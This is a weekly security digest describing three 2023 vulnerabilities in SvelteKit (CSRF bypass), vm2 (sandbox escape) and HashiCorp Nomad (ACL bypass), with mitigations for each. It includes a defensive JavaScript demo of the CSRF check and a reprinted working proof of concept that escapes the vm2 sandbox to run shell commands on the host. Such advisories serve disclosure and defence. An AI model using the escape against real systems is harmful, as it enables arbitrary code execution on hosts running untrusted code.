This week’s digest covers:
- SvelteKit’s CSRF protection bypass.
- vm2 sandbox escape in the source code transformer.
- Unauthenticated ACL authorization bypass in HashiCorp Nomad and Nomad Enterprise leads to privilege escalation.
Background
SvelteKit is a framework for building web applications using the Svelte JavaScript library. It provides a streamlined development experience by offering features such as server-side rendering, routing, and file-based page routing out of the box.
Vulnerability
This vulnerability, CVE-2023-29003, affects SvelteKit versions below 1.15.1 due to insufficient Cross-Site Request Forgery (CSRF) protection. Prior to SvelteKit 1.15.1, the CSRF check tested whether (1) the request was a POST, (2) there was a mismatch between the site origin and the Origin HTTP header of the request, and (3) the request contained form content, as indicated by a Content-Type header of either “application/x-www-form-urlencoded” or “multipart/form-data”.
If all of these conditions are met, a 403 Forbidden response is returned. Because the check is gated on the Content-Type, it can be bypassed by sending the request with a different Content-Type, such as “text/plain”.
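The following is an added example, not SvelteKit's own code, that models the check described above. It places the pre-1.15.1 logic (origin mismatch is only enforced for form-encoded POSTs) beside a hardened variant that refuses any cross-origin state-changing request regardless of Content-Type. The request objects, the site origin and the function names are constructed for the demo and are not taken from SvelteKit; the hardened variant is one reasonable policy, not a claim about what the 1.15.1 patch does exactly.

```javascript
// Added example (not SvelteKit's code). A request is modelled as a plain
// object { method, headers } with lower-case header names.

const SITE_ORIGIN = "https://app.example.test"; // constructed value

const FORM_CONTENT_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
];

// Strip parameters such as "; boundary=..." and normalise case.
function mediaType(headers) {
  const ct = headers["content-type"] || "";
  return ct.split(";")[0].trim().toLowerCase();
}

// A missing Origin header counts as a mismatch in this demo.
function originMismatch(headers) {
  return headers["origin"] !== SITE_ORIGIN;
}

// Pre-1.15.1 style check: only form-encoded POSTs from a foreign
// origin are refused, so a different Content-Type slips through.
function isForbiddenOldCheck(request) {
  return (
    request.method === "POST" &&
    originMismatch(request.headers) &&
    FORM_CONTENT_TYPES.includes(mediaType(request.headers))
  );
}

// Hardened check (an assumption, not SvelteKit's exact patch): every
// state-changing method from a foreign origin is refused, whatever
// the Content-Type header says.
const STATE_CHANGING = new Set(["POST", "PUT", "PATCH", "DELETE"]);

function isForbiddenHardenedCheck(request) {
  return STATE_CHANGING.has(request.method) && originMismatch(request.headers);
}

// Constructed sample requests covering the cases discussed above.
const SAMPLES = {
  formCrossOrigin: {
    method: "POST",
    headers: {
      origin: "https://other.example.test",
      "content-type": "application/x-www-form-urlencoded",
    },
  },
  textPlainCrossOrigin: {
    method: "POST",
    headers: { origin: "https://other.example.test", "content-type": "text/plain" },
  },
  formSameOrigin: {
    method: "POST",
    headers: { origin: SITE_ORIGIN, "content-type": "multipart/form-data; boundary=xyz" },
  },
  crossOriginGet: {
    method: "GET",
    headers: { origin: "https://other.example.test" },
  },
};

// Returns the verdict of both checks for a named sample request.
function evaluate(name) {
  const r = SAMPLES[name];
  return { old: isForbiddenOldCheck(r), hardened: isForbiddenHardenedCheck(r) };
}

for (const name of Object.keys(SAMPLES)) {
  console.log(name, evaluate(name));
}
```

The text/plain sample is the interesting row: the old check lets it through while the hardened check refuses it. Note that the hardened policy also rejects requests with no Origin header at all, so non-browser clients hitting API routes would need an explicit exemption or a token-based scheme in a real deployment.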
Mitigation
- This vulnerability is resolved in SvelteKit version 1.15.1. We recommend upgrading to the latest version.
CVE-2023-29199: vm2: sandbox escape in source code transformer
Background
vm2 is a Node.js module that provides a sandbox environment for executing untrusted code safely. It creates an isolated execution context in which untrusted code runs without access to the global context or sensitive data.
Vulnerability
The vulnerability stems from how exceptions are handled in vm2’s source code transformer sanitization logic. It allows an attacker to bypass the handleException() function and leak unsanitized host exceptions, which makes it possible to escape the sandbox and execute arbitrary code in the host’s context.
GitHub user leesh3288 has provided a proof of concept for exploiting this vulnerability, which shows how easily code can be run in the host context.
const {VM} = require("vm2");
const vm = new VM();
const code = `
aVM2_INTERNAL_TMPNAME = {};
function stack() {
  new Error().stack;
  stack();
}
try {
  stack();
} catch (a$tmpname) {
  a$tmpname
        .constructor
        .constructor('return process')()
        .mainModule.require('child_process')
        .execSync('touch pwned');
}
`
console.log(vm.run(code));
Mitigation
- This vulnerability is resolved in vm2 version 3.9.16. We recommend upgrading to the latest version.
CVE-2023-1782: HashiCorp Nomad: Unauthenticated ACL Bypass Privilege Escalation
Background
HashiCorp Nomad is a container orchestration platform that makes it easy to deploy and manage applications in a variety of environments, including data centers, clouds, and edge locations. It provides features such as automated deployment, scaling, and self-healing, and supports multiple container runtimes and scheduling algorithms.
Vulnerability
Few details have been published about this vulnerability. However, researchers report that unauthenticated HTTP requests can bypass the intended ACL authorization whenever the request is processed on the server via internal RPC. This vulnerability affects HashiCorp Nomad and HashiCorp Nomad Enterprise versions 1.5.0 through 1.5.2.
Mitigation
- This vulnerability can be mitigated by enabling mTLS on the host cluster.
- This vulnerability is resolved in HashiCorp Nomad version 1.5.3. We recommend upgrading to the latest version.